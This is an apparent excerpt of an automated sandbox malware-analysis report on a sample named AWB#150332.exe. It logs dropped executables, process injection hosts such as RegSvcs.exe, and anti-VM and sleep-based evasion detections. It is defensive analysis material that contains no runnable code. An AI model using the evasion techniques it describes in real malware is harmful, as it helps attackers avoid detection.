                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: AWB#150332.exe PID: 5432, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: 1800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: 5160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: 9760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: A760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: A980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\AWB#150332.exeMemory allocated: B980000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 4C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 9DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 2F10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 4F10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 13D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 2E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMemory allocated: 4E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_07305AA0 rdtsc 12_2_07305AA0
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0730BD19 sldt word ptr [eax]12_2_0730BD19
                    Source: C:\Users\user\Desktop\AWB#150332.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6330Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5952Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4466Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3904Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7268
                    Source: C:\Users\user\Desktop\AWB#150332.exe TID: 3696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep count: 6330 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep count: 210 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 1204Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe TID: 3696Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\AWB#150332.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99506Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99120Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98746Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98200Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98094Jump to behavior
